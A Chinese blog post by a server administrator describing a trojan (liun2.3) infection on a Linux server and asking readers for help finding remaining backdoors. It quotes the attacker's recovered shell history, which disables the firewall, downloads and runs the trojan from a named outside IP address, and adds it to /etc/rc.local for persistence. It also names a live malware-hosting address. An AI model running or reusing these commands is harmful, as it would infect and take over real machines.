首页 > 代码库 > linux服务器中了一个liun2.3的木马

linux服务器中了一个liun2.3的木马

  

  昨天公司一台服务器突然之间不能ping,ssh无法登陆,从IDC反馈说服务器往外发包,数量巨大,CPU状态显示200%。通过ps aux查看以下进程文件是异常文件:

./liun2.3
/tmp/liun2.3
/tmp/liun2.3h
zzta.pl

刚开始以为kill掉这些进程和删掉执行文件就可以了,可是过了几分钟,这个程序又继续执行。

那好吧,就去crontab -l 看有没有定时任务,没有。

more /etc/crontab 查看有没在这里定义定时任务。也没有

想了下,既然要执行文件,那么在.bash_history上是否由于记录呢?

cd
more .bash_history
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
killall java-2013
killall wins2
killall liun2.1
killall liun2.0
rm -f -r /etc/wins
rm -f -r /etc/java-2013
rm -f -r /etc/java-2013/java-2013
rm -f -r /etc/liun2.1/liun2.1
rm -f -r /etc/liun2.1
mkdir /etc/liun2.1
cd /../tmp
wget http://60.174.234.107:1974/liun2.3
chmod 0755 liun2.3
chmod 0755 ./liun2.3
./liun2.3
echo "cd /../tmp">>/etc/rc.local
echo "chmod 0755 liun2.3">>/etc/rc.local
echo "chmod 0755 ./liun2.3">>/etc/rc.local
echo "./liun2.3">>/etc/rc.local
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
killall java-2013
killall wins2
killall liun2.1
killall liun2.0
rm -f -r /etc/wins
rm -f -r /etc/java-2013
rm -f -r /etc/java-2013/java-2013
rm -f -r /etc/liun2.1/liun2.1
rm -f -r /etc/liun2.1
mkdir /etc/liun2.1
cd /../tmp
wget http://60.174.234.107:1974/liun2.3
chmod 0755 liun2.3
chmod 0755 ./liun2.3
./liun2.3
echo "cd /../tmp">>/etc/rc.local
echo "chmod 0755 liun2.3">>/etc/rc.local
echo "chmod 0755 ./liun2.3">>/etc/rc.local
echo "./liun2.3">>/etc/rc.local

 以上是在被入侵的操作。

 看到

wget http://60.174.234.107:1974/liun2.3

直接去下载木马程序。

进一步查找,在init.d目录下发现一个木马启动程序:DbSecuritySpt

并在rc1.d、rc2.d、rc3.d、rc4.d、rc5.d、rc6.d 建立了一个指向init.d目录下的DbSecuritySpt链接

在/usr/bin/下创建一个sgb可执行程序


最后在查找liun*这样的文件时,发现在tomcat/webapps目录下发现liun2.3、liun2.3h这样的文件。

初步认定是tomcat漏洞,就对tomcat进行安全检查,并禁用已被攻击的服务,修改一些端口号。


现在服务是继续跑着,可是后门是否还有后门程序?我的服务器是怎么被侵入攻击的?我一无所知,我是半路学习linux的,对于linux安全知识缺乏,写这篇博文的目的是想知道有没有朋友也遇到这样的攻击,这个网站上都是木马,http://60.174.234.107:1974,有高手看到这博文请帮忙怎么找出这个后门,或者被感染的文件。



本文出自 “胖子笔记” 博客,请务必保留此出处http://pangz.blog.51cto.com/1865802/1433461